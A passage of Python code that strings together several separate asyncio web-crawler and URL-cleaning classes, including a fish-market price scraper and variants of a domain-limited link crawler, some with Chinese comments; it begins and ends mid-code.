200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() #Mick - raw HTML page #print(text) # Replace href with (?:href|src) to follow image links. 
urls = set(re.findall(r'''(?i)href=["']?([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: #if(url.find("/ibm/console/logon.jsp?action=OK"): # print("There is a login page") normalized = urllib.parse.urljoin(response.url, url) # path = get_domain(str(normalized)) with open(path, 'a') as temp_file: temp_file.write(str(normalized) + ',\n') temp_file.close() defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from aiohttp.request( 'get', url, connector=self.connector, allow_redirects=False, loop=self.loop) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) @asyncio.coroutine def work(self): """Process queue items forever.""" while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) #TODO Mick - getting a new URL #print("new url: ") #print(url) # path = get_domain(url) # with open(path, 'w') as temp_file: # print('writing') # temp_file.write('Domain name:') # temp_file.write(url) # temp_file.write('\n \n') # temp_file.close() self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): print("crawling...") """Run the crawler until all finished.""" workers = [asyncio.Task(self.work(), loop=self.loop) for _ in 
range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() assert self.seen_urls == set(stat.url for stat in self.done) self.t1 = time.time() for w in workers: w.cancel()
class Crawler: """Crawl the aquatic market data of a specific date interval. """ def __init__(self, start_date, end_date, max_tasks=10, max_tries=10, loop=None): self.start_date = start_date self.end_date = end_date self.max_tasks = max_tasks self.max_tries = max_tries self.loop = loop or asyncio.get_event_loop() self.session = aiohttp.ClientSession(loop=self.loop) self.q = Queue(loop=self.loop) self.t0 = time.time() self.t1 = None self.make_url_queue() def add_url(self, url): self.q.put_nowait(url) def make_url_queue(self): dates = dates_gen_fn(self.start_date, self.end_date) for date in dates: roc_year = int(date.strftime('%Y')) - 1911 query_date = '{:3d}{}'.format(roc_year, date.strftime('%m%d')).replace( ' ', '0') url = BASE_URL.format(query_date, query_date) self.add_url(url) def close(self): self.session.close() @asyncio.coroutine def parse(self, response): # print(response) if response.status == 200: content_type = response.headers.get('content-type') if content_type: content_type, pdict = cgi.parse_header(content_type) if content_type in ('text/html', 'application/xml'): json = yield from response.json(content_type=content_type) if json: # print(len(json)) for item in json: # print(item) type_name = item['魚貨名稱'] type_code = item['品種代碼'] market_name = item['市場名稱'] high_price = item['上價'] low_price = item['下價'] mid_price = item['中價'] avg_price = item['平均價'] date = item['交易日期'] trans_amount = item['交易量'] sql = ''' INSERT INTO {} (type_name, type_code, market_name, high_price, low_price, mid_price, avg_price, date, trans_amount) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)'''.format( DATABASE_TABLE) cur.execute(sql, (type_name, type_code, market_name, high_price, low_price, mid_price, avg_price, date, trans_amount)) conn.commit() return @asyncio.coroutine def fetch(self, url): """Fetch one URL.""" tries = 0 while tries < self.max_tries: try: response = yield from self.session.get(url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) # exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. return try: yield from self.parse(response) finally: yield from response.release() print('{} done'.format(url)) @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url = yield from self.q.get() yield from self.fetch(url) self.q.task_done() except asyncio.CancelledError: pass @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel() conn.close() dt = self.t1 - self.t0 print('elapsed time: {}'.format(dt))
class URLCleaner: """Preprocess and clean urls.""" def __init__(self, urls, normalizer, result_saver=print, qsize=None, result_qsize=None, num_workers=1, max_tries=4, timeout=3, max_connections=30, *, loop=None): """Async URLCleaner. :param normalizer: callable that takes url and returns normalized url or False when url is invalid or None, when url can't be validated. """ self.urls = urls self.normalizer = normalizer self.result_saver = result_saver self.loop = loop or asyncio.get_event_loop() self.q = Queue(maxsize=qsize or num_workers * 10, loop=self.loop) self.result_q = Queue(maxsize=result_qsize or num_workers * 10, loop=self.loop) self.num_workers = num_workers self.max_tries = max_tries self.timeout = timeout proxy = os.environ.get('http_proxy') if proxy: self.connector = aiohttp.ProxyConnector(proxy=proxy, limit=max_connections, loop=self.loop) else: self.connector = aiohttp.TCPConnector(limit=max_connections, loop=self.loop) self.t0 = time.time() self.t1 = None self.clean_task = None def local_clean(self, url): local_clean_url = self.normalizer(url) if local_clean_url: status = 'LOCAL_OK' elif local_clean_url is False: status = 'LOCAL_INVALID' local_clean_url = None else: status = 'UNCLEANED' return URLStat(url=url, local_clean_url=local_clean_url, remote_clean_url=None, status=status, http_code=None, exception=None) @asyncio.coroutine def remote_clean(self, urlstat): """Check URL by HEAD probing it.""" tries = 0 exception = None url = urlstat.local_clean_url headers = { 'Accept-Encoding': 'identity', } while tries < self.max_tries: try: response = yield from asyncio.wait_for( aiohttp.request('head', url, allow_redirects=True, headers=headers, connector=self.connector, loop=self.loop), self.timeout, loop=self.loop) response.close() if tries > 1: logger.info('Try %r for %r success', tries, url) break except ValueError as error: # do not need to retry for these errors logger.info('For %r raised %s', url, error) tries = self.max_tries exception = error except aiohttp.HttpProcessingError as e: logger.error('Got http error for %r, exception %s', url, e) urlstat.http_code = e.code urlstat.status = 'REMOTE_ERROR' urlstat.exception = e return urlstat except (aiohttp.ClientError, asyncio.TimeoutError) as error: logger.info('Try %r for %r raised %s, %s', tries, url, type(error), error) exception = error tries += 1 yield from asyncio.sleep(0.1) else: # all tries failed logger.error('all tries for %r failed, exception %s', url, exception) urlstat.status = 'REMOTE_ERROR' urlstat.exception = exception return urlstat urlstat.http_code = response.status if response.status == 200: remote_clean_url = self.normalizer(response.url) if remote_clean_url: urlstat.status = 'REMOTE_OK' urlstat.remote_clean_url = remote_clean_url elif remote_clean_url is False: urlstat.status = 'REMOTE_INVALID' else: # url requires authorization, can't clean urlstat.status = 'UNCLEANED' else: urlstat.status = 'REMOTE_INVALID' return urlstat @asyncio.coroutine def process_url(self, url): urlstat = self.local_clean(url) if urlstat.status == 'LOCAL_OK': urlstat = yield from self.remote_clean(urlstat) return urlstat def close(self): """Close resources.""" self.connector.close() @asyncio.coroutine def save_results(self): """Save cleaned URLStat.""" while True: urlstat = yield from self.result_q.get() try: self.result_saver(urlstat) except StopIteration: self.cancel() except Exception as e: # noqa logger.exception(e) self.result_q.task_done() @asyncio.coroutine def work(self): """Process queue items forever.""" while True: url = 
yield from self.q.get() urlstat = yield from self.process_url(url) self.q.task_done() yield from self.result_q.put(urlstat) @asyncio.coroutine def _clean(self): try: self.consumer = asyncio.Task(self.save_results(), loop=self.loop) self.workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.num_workers)] self.t0 = time.time() for url in self.urls: yield from self.q.put(url) yield from self.q.join() yield from self.result_q.join() self.t1 = time.time() logger.debug('Cleaning time %.2f seconds', self.t1 - self.t0) self.cancel() finally: self.close() def clean(self): """Run the cleaner until all finished.""" self.clean_task = asyncio.async(self._clean(), loop=self.loop) return self.clean_task def cancel(self): self.consumer.cancel() for w in self.workers: w.cancel() self.clean_task.cancel()
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__( self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) # url执行队列,使用put将url放入队列供爬虫爬取 self.seen_urls = set() self.done = [] # 完成列表,每个元素是访问url后的具名元组FetchStatistic self.session = aiohttp.ClientSession(loop=self.loop) # 单线程IO操作 self.root_domains = set() for root in roots: parts = urllib.parse.urlparse( root) # return 6 parts includes netloc(host+port) host, port = urllib.parse.splitport( parts.netloc) # www.baidu.com, 80 if not host: continue if re.match(r'\A[\d\.]*\Z', host): # 如果url是全数字 self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: # 省略www. self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) # add url to seen_urls set self.t0 = time.time() # bgn time self.t1 = None # end time def close(self): """Close resources.""" self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) # 带www. else: return self._host_okay_lenient(host) # 不带www. def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): # 这def里的内容好像和现在主流的网页代码不太match,需要使用,需修改 """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() # 返回网页代码的<body>内容 if response.status == 200: content_type = response.headers.get( 'content-type') # 只分析头部有content-type的 pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() # Replace href with (?:href|src) to follow image links. 
urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) # 在href中找urls if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic(url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get(url, allow_redirects=False) # session是个单线程IO操作,访问url,返回response。结合@asyncio.coroutine达成多线程异步IO操作 if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic( FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) # 是跳转下级连接,需要拼接出完整连接 self.record_statistic( FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: # 不是跳转下级,是完整link,则需要分析link,即下一环的协程工作 stat, links = yield from self.parse_links( response) # 提取并分析link self.record_statistic(stat) for link in links.difference( self.seen_urls): # 在links里,但不在seen_urls里 self.q.put_nowait((link, self.max_redirect)) # 放入执行队列 self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls # 如果url不在seen_urls里,则跳进except yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): # 过滤非法url LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay( host): # 过滤那些root url不在roots列表里的,roots列表见crawl.py LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine # 异步协程:爬取执行到yield from时并不会停止等待,而是立刻执行loop中的下一个爬取crawl函数 def crawl(self): """Run the crawler until all finished.""" workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] # 创建100个workers的list,其中每个work就是一个task(thread) self.t0 = time.time() yield from self.q.join() # 等待所有线程worker完成工作 # 
yield from 解释见: https://www.cnblogs.com/wongbingming/p/9085268.html # 每个耗时的动作都编写一个@asyncio.coroutine下的def,然后在这个def内用yield from连接另外一个耗时的同candy的def self.t1 = time.time() for w in workers: w.cancel() # cancel this task
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__(self, roots, # What to crawl. exclude=None, include=None, output=None, strict=True, count=None, proxy=None, max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, loop=None, no_parse_links=False): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.include = include self.output = output self.count = int(count) if count else None self.strict = strict self.proxy = proxy self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.task_exit_counter = 0 self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() self.no_parse_links = no_parse_links for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None self.output_file = self.get_file() @asyncio.coroutine def close(self): """Close resources.""" yield from self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) def parse_text(self, url, text): ''' call callback func on route ''' route, args = router.match(url) if route: route.call(text, **args) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text(errors='ignore') # Replace href with (?:href|src) to follow image links. 
urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: logger.debug('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(str(response.url), url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) # parse text self.parse_text(str(response.url), text) # do outing self.handle_output(str(response.url), text) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links def handle_output(self, url, text): if self.output: d = self.parse_output(url, text) logger.info(f'write item: {url}') outputing.do_write(self.output, d, self.output_file) def parse_output(self, url, text): html = HTML(html=text) title_ele = html.find('title', first=True) d = OrderedDict() d['title'] = title_ele.text d['url'] = url d['datetime'] = now_time() d['text'] = text return d def get_file(self): ''' generate a file name for output ''' domains = list(self.root_domains) dt = datetime.datetime.now() dt_str = dt.strftime('%Y-%m-%d %H:%M:%S') f_name = f'{domains[0]}-{dt_str}' if self.output: if self.output == 'stream': return None f_name += f'.{self.output}' return f_name @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False, proxy=self.proxy) if tries > 1: logger.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: logger.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. 
logger.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: logger.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: logger.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) # disable parse links if not self.no_parse_links: for link in links.difference(self.seen_urls): # use router to verify links if self.verify_url(link) or router.verify_url(link, url): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) except Exception as ex: logger.error(f'parse error: {url}') logger.exception(ex) finally: yield from asyncio.sleep(1) yield from response.release() @asyncio.coroutine def exit_on_empty_queue(self): if self.count and len(self.done) >= self.count: logger.warning(f'reach count: {self.count}, now quit') router.stop() if self.q.qsize() == 0: logger.warning('empty queue, now quit') yield from self.q.join() router.stop() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while router.is_running(): url, max_redirect = yield from self.q.get() logger.debug(f'work on url {url}') assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() yield from self.exit_on_empty_queue() except asyncio.CancelledError: logger.warning('canceling the worker') def url_allowed(self, url): parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): # logger.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): # logger.debug('skipping non-root host in %r', url) return False return True def verify_url(self, url): if self.include: for pattern in self.include: if re.search(pattern, url): logger.debug( f'{url} match include pattern: {pattern}, allowed') return True if self.exclude and re.search(self.exclude, url): logger.debug( f'{url} match exclude pattern: {self.exclude}, rejected') return False # default False return False def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect logger.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" try: workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() # yield from asyncio.gather(*workers, loop=self.loop, return_exceptions=True) yield from router.quit_event.wait() for w in workers: w.cancel() self.t1 = time.time() except asyncio.CancelledError: logger.warning('canceling the crawler') finally: logger.warning('closing the crawler') yield from self.close()
class Crawler: def __init__(self, root_url: str, max_redirect: int): self.max_tasks = 10 self.max_redirect = max_redirect self.q = Queue() self.seen_urls = set() # aiohttp's ClientSession does connection pooling and HTTP keep-alive for us self.session = aiohttp.ClientSession(loop=loop) # Put (URL, max_redirect) in the queue self.q.put((root_url, self.max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all work is done""" workers = [asyncio.Task(self.work()) for _ in range(self.max_tasks)] # When all work is done, exit yield from self.q.join() for w in workers: w.cancel() @asyncio.coroutine def work(self): while True: url, max_redirect = yield from self.q.get() # Download the page and add new links to self.q yield from self.fetch(url, max_redirect) self.q.task_done() @asyncio.coroutine def fetch(self, url: str, max_redirect: int): # Handle redirects ourselves response = yield from self.session.get( url, allow_redirects=False ) try: if is_redirect(response): if max_redirect > 0: next_url = response.headers['location'] if next_url in self.seen_urls: # We have already crawled this path return # Remember that we have seen this URL self.seen_urls.add(next_url) # Follow the redirect, with one less redirect remaining self.q.put_nowait((next_url, max_redirect - 1)) else: links = yield from self.parse_links(response) # Python set logic for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: # Return the connection to the pool yield from response.release()
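Both of the crawlers above call an `is_redirect` helper that is not shown in this excerpt. A minimal sketch, assuming it only needs to look at the response status code:

def is_redirect(response):
    # Treat the common 3xx responses as redirects; a stricter version
    # might also require a Location header to be present.
    return response.status in (300, 301, 302, 303, 307)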
class Spider: def __init__(self, max_tries=30, max_tasks=10, timeout=5, rootDir=os.getcwd()): self.max_tries = max_tries self.max_tasks = max_tasks self.loop = asyncio.get_event_loop() self.q = Queue(loop=self.loop) self.session = aiohttp.ClientSession(loop=self.loop) self.timeout = timeout self.rootDir = rootDir def close(self): self.session.close() def append_request(self, request): self.q.put_nowait(request) @asyncio.coroutine def _get_request(self): r = yield from self.q.get() return r @asyncio.coroutine def fetch(self, request_type, url, params, data): """Fetch one URL""" tries = 0 exception = None while tries < self.max_tries: try: print("try %s---->%d times" % (url, tries)) with aiohttp.Timeout(self.timeout): response = yield from self.session.get(url, params=params) if response.status == 200: content_type = response.headers.get('content-type') if content_type in CONTENT_TYPE_TEXT: with aiohttp.Timeout(self.timeout): content = yield from response.text( encoding='GBK') else: with aiohttp.Timeout(self.timeout): content = yield from response.read() break except asyncio.TimeoutError: print("timeout") except aiohttp.ClientError as client_error: print("client error") except Exception: print("unknown error") tries += 1 else: print("try %s---->more than %d times, quit" % (url, tries)) return None response.release() return content @asyncio.coroutine def _work(self): """Process queue items forever.""" try: while True: r = yield from self._get_request() content = yield from self.fetch(r.request_type, r.url, r.params, r.data) if (content): r.handle_func(content) self.q.task_done() except asyncio.CancelledError: pass @asyncio.coroutine def work(self): yield from self._work() @asyncio.coroutine def spider(self): """run the spider until all finished""" workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] yield from self.q.join() for w in workers: w.cancel()
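The `Spider` pulls request objects off its queue and reads `request_type`, `url`, `params`, `data` and `handle_func` from them, but their shape is not defined in this snippet. A minimal sketch of such a record and of driving the spider, where the `Request` name and the callback are illustrative assumptions:

import asyncio
from collections import namedtuple

# Hypothetical record carrying the attributes the Spider reads.
Request = namedtuple('Request', ['request_type', 'url', 'params', 'data', 'handle_func'])

def print_length(content):
    # Example callback: just report how much data came back.
    print(len(content))

spider = Spider(max_tries=3, max_tasks=5)
spider.append_request(Request('GET', 'http://example.com', None, None, print_length))
spider.loop.run_until_complete(spider.spider())
spider.close()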
class Crawler: def __init__(self, root, max_tasks=1000, loop=None, file=None): LOGGER.info('Starting Crawler ...\n') self.loop = loop or asyncio.get_event_loop() self.q = Queue(loop=self.loop) self.visited_urls = set() self.max_tasks = max_tasks self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() self.root_domains.add(host) print('Hosts : {}'.format(','.join(self.root_domains))) self.add_url(root) self.t0 = time.time() self.t1 = None filename = '{}.csv'.format(file) self.f = open(filename, 'w') self.csv = csv.writer(self.f) self.csv.writerow(CSV_HEADER) def add_url(self, url): LOGGER.debug('adding %r', url) self.visited_urls.add(url) self.q.put_nowait(url) def close(self): self.session.close() self.f.close() def host_okay(self, host): host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False return self._host_okay_strict(host) def _host_okay_strict(self, host): host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def url_allowed(self, url): parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True @asyncio.coroutine def parse_response(self, response): links = set() if response.status == 200: content_type = response.headers.get('content-type') if content_type: content_type, pdict = cgi.parse_header(content_type) if content_type in ('text/html', 'application/xml'): text = yield from response.text() urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) if links: LOGGER.info('got %r distinct urls from %r', len(links), response.url) for link in links.difference(self.visited_urls): self.q.put_nowait(link) self.visited_urls.update(links) return links @asyncio.coroutine def fetch(self, url): try: response = yield from self.session.get(url, allow_redirects=False) self.csv.writerow([url, response.status]) if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) if next_url in self.visited_urls: return else: self.add_url(next_url) else: links = yield from self.parse_response(response) for link in links.difference(self.visited_urls): self.q.put_nowait(link) self.visited_urls.update(links) yield from response.release() except aiohttp.ClientError as client_error: LOGGER.info('try for %r raised %r', url, client_error) @asyncio.coroutine def work(self): try: while True: url = yield from self.q.get() assert url in self.visited_urls yield from self.fetch(url) self.q.task_done() except asyncio.CancelledError: pass @asyncio.coroutine def crawl(self): workers = [ asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks) ] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
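Running this variant only takes a root URL and an event loop; a minimal sketch, assuming the module-level pieces it relies on (`LOGGER`, `CSV_HEADER`, `is_redirect`) are defined as the class expects:

import asyncio

loop = asyncio.get_event_loop()
crawler = Crawler('http://example.com', max_tasks=100, loop=loop, file='report')
try:
    loop.run_until_complete(crawler.crawl())
    print('crawled {} urls in {:.1f}s'.format(len(crawler.visited_urls), crawler.t1 - crawler.t0))
finally:
    crawler.close()  # closes the aiohttp session and the CSV report file
    loop.close()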
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. 这里面有两个队列.seen_urls 和 done """ # TODO xpath support # TODO uvloop support def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None def close(self): """Close resources.""" self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of 